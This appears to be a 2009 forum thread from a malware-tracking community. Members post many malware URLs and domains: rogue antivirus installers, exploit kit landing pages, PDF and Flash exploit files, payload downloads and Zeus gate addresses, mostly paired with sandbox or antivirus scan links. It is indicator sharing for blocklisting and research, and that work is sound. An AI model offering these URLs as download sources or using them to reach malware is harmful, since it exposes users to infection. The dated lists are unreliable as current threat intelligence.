http://Xp-protectioncenter.com/install/Installer.exe
http://Xpprotection-center.com/install/Installer.exe
http://Xp-protection-center.com/install/Installer.exe
http://Xpp-center.com/install/Installer.exe
http://Xppcenter.com/install/Installer.exe
http://xpprot-center.com/install/Installer.exe
http://xpprotcenter.com/install/Installer.exe
http://Xp-p-center.com/install/Installer.exe
http://Xp-pcenter.com/install/Installer.exe
http://Xp-prot-center.com/install/Installer.exe
Title: Re: daily something......
Post by: SysAdMini on January 21, 2009, 01:02:43 pm
"XP Protection Center"

braviax/brastk advertised rogue

Thanks. Added.
Title: Re: daily something......
Post by: SysAdMini on January 21, 2009, 04:00:36 pm
I have added many zeus/zbot/wsnpoem urls to list in the last days.

http://www.malwaredomainlist.com/mdl.php?search=zeus%2F&colsearch=All&quantity=50&sort=Date
Title: Re: daily something......
Post by: SysAdMini on January 23, 2009, 04:01:33 pm
Some pdf exploits

Code: [Select]
hardmoviesporno.com/rf/exp/update1.pdfAnalysis:
http://wepawet.cs.ucsb.edu/view.php?hash=6e2a9dc53394e4d4f844a91c6e430783&t=1232726861&type=js
http://www.virustotal.com/analisis/ff4c30c4e7bf97019e2595c659191103


Code: [Select]
hardmoviesporno.com/rf/exp/update2.pdf
Analysis:

http://wepawet.cs.ucsb.edu/view.php?hash=0d64591f2075368ff912ecc5ec7f9cb7&t=1232726875&type=js
http://www.virustotal.com/analisis/6c0c223baa85f44b0342072a51dc3877
Title: Re: daily something......
Post by: sparsha on January 23, 2009, 05:33:55 pm
Rogue pushed through Vxgame Trojan infection

Code: [Select]
hXXp://antivirusxppro2009.com/cgi-bin/download.pl?code=0000049
antivirusxppro2008.com

Title: Re: daily something......
Post by: SysAdMini on January 25, 2009, 11:00:59 am
Rotators

Code: [Select]
http://diettopseek.cn/in.cgi?cocacola
http://yourliteseek.cn/in.cgi?cocacola
http://litetoplocatesite.cn/in.cgi?cocacola2
http://litepremiumlist.cn/in.cgi?cocacola
http://nanotopfind.cn/in.cgi?cocacola

rotate to

Code: [Select]
http://murom-hotel.com/system/index.php
http://326g.com/forums/includes/hooks/system/index.php
http://parsrabota.reg36.ru/includes/system/index.php
http://alink.belstom.ru/partners/system/index.php
http://daiwa-cormoran.ru/mods/catalog/acr/system/index.php
http://taraxacum.ru/templates/siteground95/images/system/index.php
http://love-sad.ru/img/system/index.php
http://avtonchik.ru/images/stories/fruit/system/index.php
http://sunucum2.kaliteweb.net/~burctnet/system/index.php
http://ecogroup-vrn.ru/site/i/css/system/index.php
http://demokoksander.nl/recepten/system/index.php
http://2vb.ru/tetisgal/images/system/index.php

exploits from all sites lead to the same file :

http://www.virustotal.com/analisis/1a10833084a81f73b84c2a40f64d6302 2/35 !!!!


Rogue
Code: [Select]
http://imunizator.net/
best-online-antivirus-scanner.info/scan.php
best-antivirus-2010-scanner.info/scan.php
best-antivirus-2010-download.info/install.php
antivirus-scanner-online.com/scan.php
Title: Re: daily something......
Post by: sparsha on January 26, 2009, 07:29:53 am
Rogues

Code: [Select]
http://antispyknight.biz/files/antispyknight.msi
http://antispyknight.info/files/antispyknight.msi
http://total-defender.com/download/total-defender-setup.exe
Title: Re: daily something......
Post by: SysAdMini on January 27, 2009, 12:51:39 am
Rogue Winiguard

Code: [Select]
94.247.2.173/.dif/go.php?sid=1
Redirectors to LuckySploit
Code: [Select]
94.247.2.50/.dif/go.php?sid=1
94.247.2.52/.dif/go.php?sid=1
94.247.2.157/.dif/go.php?sid=1
Title: Re: daily something......
Post by: aaudi on January 27, 2009, 02:53:37 am
already posted ... <modified>

hxxp://www.hoho-3.cn/ gr.exe - Downloader
Title: Re: daily something......
Post by: sparsha on January 27, 2009, 07:58:36 am
IE Security new rogue from IEDefender family.

Code: [Select]
http://ie-security.com/_download.aspx
http://216.240.151.112/ie.exe
https://secured-software-order.com/iesa2/
Title: Re: daily something......
Post by: aaudi on January 28, 2009, 04:36:45 am
Related to popups
Code: [Select]
hxxp://ifengw.com/TT.exe
Title: Re: daily something......
Post by: sparsha on January 28, 2009, 08:07:49 pm
XP Police Antivirus rogue sites: courtesy S!R!

Code: [Select]
xp-police.com
http://xp-police.com/installed.php?id=dress
http://xp-download-center.com/exe3/dress.exe


Title: Re: daily something......
Post by: sparsha on January 30, 2009, 02:03:36 pm
Sites related to SysAntivirus 2009 rogue application.

Code: [Select]
sysantivirus2009.com
http://files.sysav-download.com/load/setup_1_1_.exe
http://int.sysreport1.com/stat.php?func=installrun&id=1&landing=1&lang=EN&sub=0
http://dl.sysav-storage.com/get/?type=main&pin=1&lnd=1
http://int.sysreport2.com/stat.php?func=ok
http://int.sysreport1.com/dom1.php
http://sales.buysysantivirus2009.com/pay/MQ==_MA==_RTA5MDUwNzk=/1/

Title: Re: daily something......
Post by: sparsha on January 30, 2009, 07:18:09 pm
Sites related to  System Guard 2009 rogue application.

Code: [Select]
dlsg09.com
dlsgd3.com
getsysgd09.com
sg12scanner.com
sg9scanner.com
systemguard2009.com
systemguard2009m.com
Title: Re: daily something......
Post by: sparsha on February 01, 2009, 02:19:12 pm
Scam sites involved in distributing "Antivirus 2009" Rogue security application

Code: [Select]
http://internetinterestingplaces.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://pleaseclickhere.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://anti-malware-scanner.com/promo/1/freescan.php?nu=880479
http://antimalware-scanner.com/promo/1/freescan.php?nu=880182

Title: Re: daily something......
Post by: SysAdMini on February 06, 2009, 07:43:27 pm
Code: [Select]
hxxp://elkonline.pl/images/eventlist/venues/small/systemhttp://wepawet.cs.ucsb.edu/view.php?hash=b6f6603d951fdcdf047cc3815498ac94&t=1233950001&type=js
Title: Re: daily something......
Post by: SysAdMini on February 07, 2009, 01:27:27 pm
Code: [Select]
toppharma.net/123/sorted/pr/system
pixion.nl//foto/gallery/lente/images/system
http://wepawet.cs.ucsb.edu/view.php?hash=a247ae9bf05e543a750c686e75f3455b&t=1234013661&type=js

Code: [Select]
medamphetamin.cn/fffxxx3/http://wepawet.cs.ucsb.edu/view.php?hash=ea313d55e625a0d576848943a6165b9f&t=1234038737&type=js
Title: Re: daily something......
Post by: sparsha on February 08, 2009, 03:53:10 am
Sites involved in distributing Rogue Security applications

Code: [Select]
System-tuner.com
Systemsecurityse.com
Electronicbillinghost.com
Securesoftwarepays.com
Xpyburner.com
Xpyburnerpro.com
Hdrivesweeper.com
Hdrivesweeperpro.com

antispyware3000.net

Antivirus2009plus.com
rapidantivirus-09.com
rapid-antivirus-2009.com
rapidantivirus-2009.com
rapid-antivir2009.com
rapidantivirus2009.com
rapidantivirus09.com
extraantivir.com

ie-security-config.com
virus-doctor.com
Title: Re: daily something......
Post by: SysAdMini on February 08, 2009, 07:00:11 pm
Code: [Select]
http://xapaxapa.ru/todance1/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=e61e2bc83427a3c841a6ff970b76e249&t=1234120297&type=js
Title: Re: daily something......
Post by: sparsha on February 15, 2009, 03:24:49 pm
Antivirus 2009 related sites..
Code: [Select]
http://laspaceevents.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://malwareprosecurityscanner.com/promo/1/freescan.php?nu=880182&back==TQw1TD3NEMMMI=O
http://malwareprosecurityscan.com/promo/1/freescan.php?nu=880553&back==zQ02jD3NEMMMI=M
Title: Re: daily something......
Post by: sparsha on February 18, 2009, 05:29:57 pm
Rogues

Code: [Select]
xpvirusprotection.com
totalmalwareprotection.com
totalvirusprotection.com
Xpvirusprotection2009.com
malware-doc.com
Title: Re: daily something......
Post by: sparsha on February 19, 2009, 01:19:23 pm
Code: [Select]
av1-download.info
av1-site.info

http://downloads.anti-virus-2010.info/en/exe/StageThree.exe
http://downloads.anti-virus-2010.info/en/exe/StageTwo.exe
http://downloads.anti-virus-2010.info/en/exe/svchost.exe
http://downloads.anti-virus-2010.info/en/exe/QWProtect.dll

Title: Re: daily something......
Post by: sparsha on February 20, 2009, 01:04:39 pm
Code: [Select]
http://antivirus1-site.info/install.php
http://antivirus1-download.info/en/exe/install.exe
Title: Re: daily something......
Post by: SysAdMini on February 21, 2009, 03:43:56 am
Code: [Select]
www.luckffxi.comhttp://wepawet.cs.ucsb.edu/view.php?hash=8e2190d1410d684b1b814a39b62288bb&t=1235188110&type=js

Code: [Select]
web.114baines.com/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=71c5258f6e3d469fabbe0eb372636e40&t=1235188376&type=js

Code: [Select]
www.hynno8744.cn/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=dd7e0777ff2996e20f947903e874c8b0&t=1235188509&type=js

Code: [Select]
down.114anhui.com/1/index.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=d912a96fa590ecfad9a77d60ca4fbcb8&t=1235189761&type=js

Code: [Select]
www.ffxionlion.com/download/ffxi.exehttp://www.virustotal.com/analisis/4e769eda073397abb033c663022d1ad4

Code: [Select]
/www.ffxionlion.com/download/wow.exehttp://www.virustotal.com/analisis/5f1fb36b313ecea141a217e086fe02b9

Code: [Select]
www.ffxionlion.com/download/mj.exehttp://www.virustotal.com/analisis/42ec3ff4dcc6e56fa05951228b43de41
Title: Re: daily something......
Post by: SysAdMini on February 22, 2009, 03:50:10 pm
Code: [Select]
reddii.ru/traffic/sploit1/index.phphttp://wepawet.cs.ucsb.edu/view.php?hash=98857f2f00af684e185cdc1c165030a2&type=js

Title: Re: daily something......
Post by: sparsha on February 23, 2009, 09:43:35 am
Code: [Select]
xp-police-antivirus.com
Xp-police-2009.com
Xp-police-av.com
Xp-police-engine.com
xp-police-09.com

http://files.msdownloadsav.com/codec/codec_200002.exe
http://dl.msantivirstorage.com/get/?pin=200002&lnd=-1&type=main
http://int.ms-asreport1.com/dom1.php
Title: Re: daily something......
Post by: SysAdMini on February 23, 2009, 03:56:44 pm
Code: [Select]
hxxp://cccbbbb.cn/1/rr.htmhttp://wepawet.cs.ucsb.edu/view.php?hash=a4d9fe888d4104e456afe2dd8df1367e&t=1235400090&type=js
Title: Re: daily something......
Post by: sparsha on February 24, 2009, 07:09:23 pm
Code: [Select]
http://stabilityinternetworld.com/download.php?affid=00000
http://stabilityinternetworld.com/install/installpv.exe
http://scanstabilityonline.com/download.php?affid=08100
Title: Re: daily something......
Post by: sowhat-x on February 26, 2009, 11:57:07 am
Few Pinches...
Code: [Select]
hxxp://avto-mashine.freehostia.com/
hxxp://likrion.ho.ua/1.php
hxxp://maxi163.far.ru/maxi/maxi.php
hxxp://rus-shop.info/gate.php
hxxp://test.bboys.tu2.ru/gate.php
hxxp://thelogofpinch.freehostia.com/gate/gate.php
hxxp://www.cybertm.tu1.ru/admin/admin.php
hxxp://www.patr0n87.tu2.ru/reports/gate.php
hxxp://www.teploplast-nn.ru/admin/admin.php
hxxp://www.tihvin.tu2.ru/italy/gate.php
hxxp://ykosty.freehostia.com/gate/
Title: Re: daily something......
Post by: SysAdMini on February 26, 2009, 07:00:41 pm
Code: [Select]
ultradant.cn/dis9/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bd77359c919df7385285588e2409df84&t=1235675351&type=js

http://www.virustotal.com/analisis/8222b3a4b72a2b49f689099ff81406b6 14/39


Code: [Select]
http://divinets.cn/z/5.htmcontains encoded iframes

Code: [Select]
211.95.79.58/y/index.phpmany exploits
http://wepawet.cs.ucsb.edu/view.php?hash=5648ff6fc1ba1b43bcf2d7abc6770be4&t=1235473451&type=js

Code: [Select]
dvcd.info/evo/count.php?o=2
flash exploit dvcd.info/evo/exploits/x19.php?o=2&t=1235675434&i=1081047572
pdf exploit dvcd.info/evo/exploits/x18.php?o=2&t=1235675434&i=1081047572
exe dvcd.info/evo/getexe.exe?o=2&t=1235675434&i=1081047572&e=18
flash http://wepawet.cs.ucsb.edu/view.php?hash=c99916c1ad66815a48271f48f8e2db7a&type=swf
pdf http://wepawet.cs.ucsb.edu/view.php?hash=4d136b35fb9c3c50f1a7216b40bed9ed&t=1235677319&type=js
exe http://www.virustotal.com/analisis/3c3290226366784976aeb0c69f9c1517 21/39

Code: [Select]
prororo7.net/sp/index.php
prororo7.net/sp/s/f.pdf
http://wepawet.cs.ucsb.edu/view.php?hash=400499d9ab35a63f39552b25f9e04fbd&t=1235678776&type=js
http://www.virustotal.com/analisis/5b9a8bb60a602e71ea377e51ced56aaa 27/39


Code: [Select]
toureg-cwo.ch/fta/index.phpexploits/zbot
http://wepawet.cs.ucsb.edu/view.php?hash=66bab88192d8490d32e5c60a30231555&t=1235679132&type=js
http://www.virustotal.com/analisis/24b84a42c57c90a1a9dc69c8ae91dd1d 9/38

Code: [Select]
gavai-pegc9.ws/bI/index.phpexploits, redirects to toureg-cwo.ch
Title: Re: daily something......
Post by: SysAdMini on February 27, 2009, 02:58:30 pm
Code: [Select]
findrosain.ru/find/http://wepawet.cs.ucsb.edu/view.php?hash=3c0b4261f5467c208d1c8bd07a2e9a0f&t=1235747603&type=js

Code: [Select]
findrosain.ru/lovehttp://wepawet.cs.ucsb.edu/view.php?hash=b2636ac6565fdc94e9e2a19cf46941d7&t=1235833030&type=js
Title: Re: daily something......
Post by: sparsha on February 27, 2009, 08:49:42 pm
Av2009 and Av360 Throwaway sites

Code: [Select]
http://thebestworldparty.cn/soft.php?aid=0479&d=1&refer=9d9cbe78e
http://proantimalwarescan.com/promo/1/freescan.php?nu=880479&back==

http://spaceindustrial.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://prosystemonlinescanner.com/promo/1/freescan.php?nu=880182&back==

http://worldcommercialbusiness.cn/soft.php?aid=0553&d=1&refer=d58bf6d15
http://pro-antimalware-scanner.com/promo/1/freescan.php?nu=880553&back==
Title: Re: daily something......
Post by: SysAdMini on February 28, 2009, 10:55:31 am
Exploits/trojan
Code: [Select]
breakingnews.usnewnews.com/liveinternet.js
breakingnews.usnewnews.com/fresh/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7ebea0ac579a5d9ca9e3156a662749e8&t=1235819223&type=js
http://www.virustotal.com/analisis/8eb587635d3bad9d37b9a5e7b06d2389
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 03:36:49 pm
Code: [Select]
an92.net/myy/index.php
pdf exploits
Code: [Select]
an92.net/myy/firefox.pdfhttp://www.virustotal.com/analisis/3089407073a361a9f3091e57ffbe3c99 16/39
MD5...: 61ac62ef2879e4ce1682f730f2015f09
http://wepawet.cs.ucsb.edu/view.php?hash=5eb164252fc11870b11a94b37f3f4394&t=1235921432&type=js

Code: [Select]
an92.net/myy/firefox2.pdfhttp://www.virustotal.com/analisis/574194324cf37f372fb6fba43c282458 14/38
MD5...: 24ca3bb5e3843ad86fb8302f97cc709a
http://wepawet.cs.ucsb.edu/view.php?hash=742f6815506fe5158de1caf392d33025&t=1235921582&type=js

payload
Code: [Select]
an92.net/myy/load.php?xpl=pdf&browser=Firefoxhttp://www.virustotal.com/analisis/0e6347a92768298244d2a1969bc70fd4 4/39
MD5...: c0e86259278d8e3dba3fe346866022da
http://www.threatexpert.com/report.aspx?md5=c0e86259278d8e3dba3fe346866022da

requests
Code: [Select]
bucefal.org.ua/bro/ld.php?v=1&rs=76487-337-8429955-226141824245000&n=1&uid=1Emo-loader
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 04:28:57 pm
pdf exploit
Code: [Select]
www.kuplon.biz/smun/pdf.php?id=2435&vis=1http://www.virustotal.com/analisis/47e606a0b63ebf3bcf819440f0da1441 13/39
MD5...: f1e5aa71ff2f65a7cf553ee011e2632c
http://wepawet.cs.ucsb.edu/view.php?hash=f66f78791092123d5e7989f47b548aa8&t=1235925405&type=js

payload
Code: [Select]
http://www.kuplon.biz/smun/load.php?id=2435&spl=69http://www.virustotal.com/analisis/c90c5ce9e2386722d6c21b38e5888c76 3/39
MD5: b0acf2f559db5d993ff720a74febdc83
Title: Re: daily something......
Post by: SysAdMini on March 01, 2009, 05:15:55 pm
pdf exploit
Code: [Select]
www.geodll.biz/ar/spl/pdf.pdf
setcontrol.biz/ar/spl/pdf.pdf
http://www.virustotal.com/analisis/36622b4ff10e0293f3ed1b8e724d8a7c 6/39
MD5...: 647da8d2ee1213926331077babafb8e4
http://wepawet.cs.ucsb.edu/view.php?hash=a36fd77906ead994adcb7256c8be4a8c&t=1235928293&type=js

payload
Code: [Select]
geodll.biz/ar/exe.phphttp://www.virustotal.com/analisis/fb7fc693aa7b63865d25628f17b4bb0c 11/38
MD5...: e8034060f4e05f9e461faf7e139f2f5d
Title: Re: daily something......
Post by: SysAdMini on March 03, 2009, 09:38:51 am
Code: [Select]
vsedlysna.ru/img/site/2/?viagrahttp://wepawet.cs.ucsb.edu/view.php?hash=b0807cd3d6f0c516fbd64a54e58ff0d2&t=1236073833&type=js
http://www.virustotal.com/analisis/9ff9a32c276bbcd97b2119a79312bce2
Title: Re: daily something......
Post by: sparsha on March 07, 2009, 06:34:57 am
Malware Defender 2009 rogue related sites:

Code: [Select]
http://easywinscanner17.com/sysgd09_2/3/10284
MalwareDefender2009.com
http://gomaldef09.com/buy.html?track_id=10001&bill_id=0

http://89.149.251.181/maldef09/install.php?track_id=10284
http://89.149.251.181/maldef09/setup.php?track_id=10001
http://78.159.99.58/maldef09/install.php?track_id=10511

Title: Re: daily something......
Post by: sparsha on March 07, 2009, 12:15:41 pm
Av360 Throwaway sites contd...

Code: [Select]
http://whereismat.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://falloutneferwin.cn/soft.php?aid=0468&d=5&refer=bb916128e
http://whreismyplugnplay.cn/soft.php?aid=0560&d=1&refer=b8ced57fa
http://softwareoverworld.cn/soft.php?aid=0553&d=1&refer=d58bf6d15

http://fastantimalwarescan.com/promo/1/freescan.php?nu=880553&back==jQ20zj0NIMNMI=M
http://fast-antimalware-scanner.com/promo/1/freescan.php?nu=880182&back==DQ52zj0NIMMMI=M
http://fast-antimalware-scan.com/promo/1/freescan.php?nu=880468&back==zQ01Dj0NIMNMI=M

Title: Re: daily something......
Post by: sparsha on March 08, 2009, 11:37:47 am
Code: [Select]
Advancesoftpc.com
Antispywarepro.net
scanspywareonline.net
Pcspeed-up.com

http://www.netspywarescan.com/online-scan.html?ewmid=225
Title: Re: daily something......
Post by: bobby on March 09, 2009, 02:00:14 pm
Code: [Select]
http://easywinscanner17.com/maldef09_1/4/10242
http://fastantimalwarescan.com/promo/1/freescan.php?nu=880017&back=%3DTQ55jj2NAMNMI%3DO
Title: Re: daily something......
Post by: sparsha on March 12, 2009, 04:02:50 pm
Av360 Throwaway sites contd...

Code: [Select]
http://advertisechoice.cn/soft.php?aid=0182&d=1&refer=289ce6417
http://vivaldinaruto.cn/soft.php?aid=1001&d=1&refer=184b911aa
http://awardspacelooksbig.cn/soft.php?aid=0468&d=5&refer=bb916128e


http://bestantimalwarescanner.com/promo/1/freescan.php?nu=880182&back==DQw3zj4NcMMMI=O
http://bestantimalwarelivescan.com/promo/1/freescan.php?nu=880468&back==TQ0xzj4NcMMMI=M
http://online-antimalware-scanner.com/promo/1/freescan.php?nu=881001&back==DQywDj3NAMNMI=O

ANG AntiVirus 09 rogue related

Code: [Select]
Angantivirus-2009.com
Angantivirus2009.com
Title: Re: daily something......
Post by: SysAdMini on March 12, 2009, 08:55:01 pm
Quote
Av360 Throwaway sites contd...

Code: [Select]
trustedpaymentsystem.com
antivirus360-protection.com
liveantivirusscanner.com

Title: Re: daily something......
Post by: SysAdMini on March 13, 2009, 02:37:19 pm
exploits/zbot

Code: [Select]
4you.vippif.comhttp://wepawet.cs.ucsb.edu/view.php?hash=f73ece587f4d906b256f108bbdb486c9&t=1236954537&type=js
Title: Re: daily something......
Post by: sowhat-x on March 14, 2009, 05:58:56 pm
Quote
hxxp://213.155.10.56/exe2/3913960.exe
hxxp://213.163.65.9/codec/140.exe
hxxp://asiametal.biz/tds/in.php
hxxp://dbs-softportal.com/viewtubesoftware.40016.exe
hxxp://fullantispywarescanner.com/promo/download/trial/InstallAVg_880899.exe
hxxp://heur.net63.net
hxxp://hothotvideo.com/install.php?uid=9c0baa17cab48c54e8a6d01b47ff1fb7
hxxp://likrion.ho.ua
hxxp://loyaltube.com/tube/?id=140
hxxp://mtwproductions.com.au/gate/
hxxp://porno-tube-x.com/l/berror/id/3913960/
hxxp://rusrm.com/z/cfg.bin
hxxp://streamingtubes2009.com/xplaymovie.php?id=40016
hxxp://viagra-generic-cialis-daily.com
hxxp://video-go.net/go/go.php?sid=1
hxxp://www.globalvisionobdr.com/gate/
hxxp://www.karinya.net.au
hxxp://xbalamquetulum.com
Title: Re: daily something......
Post by: sparsha on March 14, 2009, 07:35:37 pm
Rogue related

Code: [Select]

http://checkclick-site.info/install.php
http://checkclick-download.info/en/PE/install.exe

http://virusdoctor-pro.com/downloads/?uid=7&l=69
http://pay-virusdoctor.com/lo/5/index.php?

Virusmelt.com
Virusmeltpro.com
http://payvirusmelt.com/lo/5/index.php?

http://updvms.net/update.exe
http://updvms.cn/update.exe
http://updvms.net/Rpdm.exe
http://updvms.cn/Rpdm.exe

Title: Re: daily something......
Post by: sowhat-x on March 15, 2009, 02:28:14 pm
Quote
hxxp://nuclear777.com/1.1.0.0/
hxxp://videoblog.kilu.de/
Quote
hxxp://1.114central.com/17/02.htm    
hxxp://1.114central.com/4/02.htm    
hxxp://baidusib.cn/01/ytxxz.htm    
hxxp://baidusib.cn/05/ytxxz.htm
hxxp://baidusib.cn/06/ytxxz.htm   
hxxp://www.hynno8744.cn/13/02.htm
hxxp://www.hynno8744.cn/17/02.htm
hxxp://www.hynno8744.cn/18/02.htm    
hxxp://www.hynno8744.cn/20/02.htm    
hxxp://www.hynno8744.cn/21/02.htm
hxxp://www.hynno8744.cn/22/02.htm    
hxxp://www.hynno8744.cn/23/02.htm    
hxxp://www.hynno8744.cn/26/02.htm    
hxxp://www.hynno8744.cn/29/02.htm    
hxxp://www.hynno8744.cn/31/02.htm
Title: Re: daily something......
Post by: sowhat-x on March 15, 2009, 03:31:18 pm
Quote
hxxp://94.247.3.147/rot/xc01/index.php
hxxp://94.247.3.147/wpa/dog/index.php

Quote
hxxp://91.207.4.122/spm/s_alive.php?id=816050030546&tick=3910437&ver=500&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=663551200501&tick=423109&ver=202&smtp=b
hxxp://91.207.4.122/spm/s_alive.php?id=355751445710&tick=27198703&ver=202&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=522056062568&tick=24860734&ver=500&smtp
hxxp://91.207.4.122/spm/s_alive.php?id=605657882560&tick=1229828&ver=201&smtp=
hxxp://91.207.4.122/spm/s_alive.php?id=255660652365&tick=228672609&ver=224&smt
There used to exist in public view "91.207.4.122/status", but now he/she's "fixed" that,redirecting to cn.yahoo.com.
Google still has the cache page though:
http://74.125.77.132/search?q=cache:4eUiegnhAFgJ:91.207.4.122/status+91.207.4.122
Title: Re: daily something......
Post by: GmG on March 16, 2009, 10:11:42 am
LeFiesta Exploit
Code: [Select]
http://89.248.172.156/660/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=bce9710a8cfc8452ff64a0916ebf54a4&t=1234723683&type=js
Code: [Select]
http://biglendlive.info/hitstat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2d3e1eab37b1bf8225cccc6e808f0912&t=1236937612&type=js
Code: [Select]
http://lafi.babjr.cn/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=96051f135ea17fc81786f21d8f6315d5&t=1235407081&type=js
Code: [Select]
http://leepe.cn/cat/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=cf10ba345d696fb6b4b19704eeee4866&t=1236765069&type=js
Code: [Select]
http://leepe.cn/eng/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=c866c23b22cf6c8e8f993623c5060d9e&t=1237200054&type=js
Code: [Select]
http://piratik.biz/exp/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=7fba86140376a1fc3e6fa8a4e05612bf&t=1235415814&type=js
Code: [Select]
http://piratik.biz/exp5/index.php
http://wepawet.cs.ucsb.edu/view.php?hash=2aa87c66d9d626cec6793fe1cd2d75e9&t=1235415776&type=js
Code: [Select]
http://thelegion74.com/yu5/index.php

Code: [Select]
http://vippif.com/fiesta/
http://wepawet.cs.ucsb.edu/view.php?hash=a1efe8f6cb881a9fd88991f4a4b25d1f&t=1237200606&type=js
Code: [Select]
http://weblife.net23.net/
http://wepawet.cs.ucsb.edu/view.php?hash=49ecb0704f81a59636e18607087534a1&t=1237201220&type=js
Code: [Select]
http://www.thebestlog.org/cruz/
http://wepawet.cs.ucsb.edu/view.php?hash=b44dd93b6aebad5b6b6d7eec57926621&t=1234633908&type=js
Title: Re: daily something......
Post by: GmG on March 16, 2009, 11:13:45 am
Koobface

Code: [Select]
http://viewworldh.com/download/1/1000/5
http://viewworldy.com/download/1/1000/5
http://ldj5.biz/setup.exe

MBR Rootkit /Sinowal / Mebroot  new IP 76.76.22.221

Code: [Select]
http://akajjcthr.com/ld/ment/
Title: Re: daily something......
Post by: GmG on March 16, 2009, 12:51:39 pm
Code: [Select]
http://1zs0ewvqcget52rl1z1n.cn/s_t_t.php
http://2d2deozghamea1m1ifn3.cn/s_t_t.php
http://dcz9ubei212vp3nrca5i.cn/s_t_t.php
http://ddvrrflabpqcuoaexpwp.cn/s_t_t.php
http://dihbgbwqryuolfbebgme.cn/s_t_t.php
http://egntxselsaossawilurx.cn/s_t_t.php
http://fcsvjiajnerwjjmtnfzu.cn/s_t_t.php
http://hsyzpbavkojdqclhnoqz.cn/s_t_t.php
http://ivdqvmbxktixdpleamjg.cn/s_t_t.php
http://jetvokzbdgktxubiiphn.cn/s_t_t.php
http://lmempodfzrqqkteyupar.cn/s_t_t.php
http://lufwhtelkadvrtaukqjo.cn/s_t_t.php
http://qjiv7qj4irh2f1o2v8sm.cn/s_t_t.php
http://tckeblkiumuhysrwqlev.cn/s_t_t.php
http://xbfnyukgdoqrjrsfmcdm.cn/s_t_t.php
http://xpehbam.cn/s_t_t.php
http://zjjrrhhuokjxgmulisxs.cn/s_t_t.php
http://znchygdrmelzejjvofji.cn/s_t_t.php
http://zteersxhgcddtfktecrq.cn/s_t_t.php
http://wepawet.iseclab.org/view.php?hash=de7f0c270430a281f48625fee7166324&t=1237203611&type=js

Code: [Select]
http://234954382524.cn
http://wepawet.iseclab.org/view.php?hash=d37fb9bbc20226eb605422b627e757ed&t=1237203979&type=js

Code: [Select]
http://438723847234.cn/sem/index.php
http://wepawet.iseclab.org/view.php?hash=de4915ce6ed63b2670e6c810ecdd2017&t=1237204176&type=js

Code: [Select]
http://adscounter.cn/package/
http://wepawet.iseclab.org/view.php?hash=77c3b2fc8a4cc7cbf7fcdf32d0c16119&t=1237204323&type=js

Code: [Select]
http://s1.s2.s3.s4.yahoo.com.longebook.cn/qq/
http://wepawet.iseclab.org/view.php?hash=26e6cf1dc8e2ab9be7e3172208dfcb92&t=1237205518&type=js

Code: [Select]
http://foxbelive.ru/pic1/
http://foxxpriv.ru/pic1/
http://wepawet.iseclab.org/view.php?hash=36da7ee709e19b965a17a4d88306ce00&t=1237205612&type=js

Code: [Select]
http://g00gle-analyze.com/slg2/
http://wepawet.iseclab.org/view.php?hash=a8ce4d33e27b67f88cfb7ed4fe845b56&t=1237050231&type=js

Code: [Select]
http://hunters-of-darkness.de/cgi-stat/index.php
http://wepawet.iseclab.org/view.php?hash=3b376c010ae0fbc67f6edd14fa48375a&t=1237206013&type=js

Code: [Select]
http://jimmgoland.1sthost.org/filter/
http://wepawet.iseclab.org/view.php?hash=59e48910a0e080084083b3ee824ef055&t=1237206179&type=js

Code: [Select]
http://ncsmichigan.com/images/pack/index.php
http://wepawet.iseclab.org/view.php?hash=3525a035f08a9dbffd6b63f448f285b0&t=1237206521&type=js

Code: [Select]
http://telenet.kz/kabel/cer/
http://wepawet.iseclab.org/view.php?hash=33f5575880f59efb8f70e53668da2610&t=1237207441&type=js

Code: [Select]
http://chriscleaningco.com/images/
http://gifts2009.net/aga/in.php
http://gold-sutra.info/gpack/
http://php4php.xtreemhost.com/admin/
http://prostolab.net/inf/index.php
http://russiannews.ru/arabic/data/news/upload/exp/
http://prostolab.net/inf/index.php

Code: [Select]
http://e.caricare.net/e/count.php?b=1004
http://e.caricare.net/e/ii.php?b=1004
Title: Re: daily something......
Post by: SysAdMini on March 16, 2009, 02:01:58 pm
FakeAV /TDSS
Code: [Select]
user4scan.com/download/install.php
http://wepawet.iseclab.org/view.php?hash=754d4813959d15ce5863681399b81592&t=1237085096&type=js
http://www.virustotal.com/analisis/78ce7b57f666f2530e83d9301b5341c8
Title: Re: daily something......
Post by: SysAdMini on March 16, 2009, 07:17:00 pm
Thanks guys,

I'm happy to see contributing members. Keep up the good work !
Title: Re: daily something......
Post by: sparsha on March 18, 2009, 05:07:48 am
Rogue sites:

Spyware Fighter/Spy Fighter related sites

Code: [Select]
Spw-fighter.com
Spwfighter.com
Spyware-fighter.com
Spw-fight.com
Spywarefighter2009.com
Spwfight.com
Spywarefighter2k9.com
Spywarekick.com
Spywaresfighter.com
Spyfighter.biz
Spyfighter.org


http://spw-fight.com/in/4/1/1/0000000000000000
http://download.spw-fight.com/?user_id=0&sub_id=0&hash=0000000000000000
http://spwfght.com/download2.php?user=4&subid=32
http://spwfighter.com/dl/download2.php?user=4&subid=32
http://spyfighter.org/Installer.exe


Title: Re: daily something......
Post by: sparsha on March 18, 2009, 07:55:31 am
Rogue related

Code: [Select]
http://renus2008.com/renus.exe
1-renus2008.com
3-antispyware3000.net
Title: Re: daily something......
Post by: SysAdMini on March 18, 2009, 08:00:28 am
Rogue related too

Code: [Select]
go-uniq.com/in.cgi?13&gai=cspamg&gli=79
rotates to
Code: [Select]
removespywarethreats.com
desktoprepairpackage.com
pcantimalwaresolution.com

Some more at the same ips

